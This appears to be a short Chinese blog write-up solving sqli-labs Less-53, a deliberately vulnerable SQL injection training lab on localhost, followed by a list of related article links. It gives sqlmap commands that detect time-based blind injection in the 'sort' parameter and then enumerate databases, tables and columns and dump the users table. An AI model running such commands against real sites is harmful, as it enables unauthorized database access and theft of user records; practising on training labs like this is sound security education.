sqli-labs-Less-53

heze092026-03-28 16:06

SQLI-LAPS 实验记录

Less-53

这一关与上一关类似,也是没有回显信息,采用sqlmap工具进行注入,发现只有时间盲注可以使用,因此,继续使用sqlmap工具来解决问题。

首先我们在命令行中输入sqlmap命令:

sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch

结果如图所示,只有一种注入方式:时间盲注。

接下来,我们继续使用sqlmap工具来进行注入,爆出数据库名、表名、列名等,语句如下:

  • 查询库名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch --dbs
  • 查询表名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security --tables
  • 查询列名:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --columns
  • 查询数据:
sql 复制代码 
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --dump
相关推荐
m0_734949792 小时前
MySQL如何配置定时清理过期备份文件_find命令与保留周期策略
jvm·数据库·python
m0_514520573 小时前
MySQL索引优化后性能没提升_通过EXPLAIN查看索引命中率
jvm·数据库·python
NaMM CHIN3 小时前
sql实战解析-sum()over(partition by xx order by xx)
数据库·sql
不瘦80斤不改名3 小时前
深入浅出 MySQL(一):一文理清 SQL 核心规范与五大分类
数据库·sql·mysql
woniu_buhui_fei3 小时前
MySQL知识整理二
数据库·mysql
Polar__Star4 小时前
如何在 AWS Lambda 中正确使用临时凭证生成 S3 预签名 URL
jvm·数据库·python
Lucifer三思而后行4 小时前
zCloud 中 Oracle 实例状态未知问题记录
数据库·oracle
island13144 小时前
最详细VMware Workstation 17 上安装 Ubuntu 系统
linux·数据库·ubuntu
菩提小狗4 小时前
每日安全情报报告 · 2026-04-21
网络安全·漏洞·cve·安全情报·每日安全
卢傢蕊5 小时前
MongoDB
数据库·mongodb
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free05近期有什么ai的新消息,新动态? 2026.4月06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07Claude Code Windows 兼容性问题:指定版本 2.1.112 可解决08从限购到畅通:GLM-5.1 Coding Plan接入攻略09CC-Switch & Claude 基于 Linux 服务器安装使用指南10UBUNTU Claude Code 报错 claude native binary not installed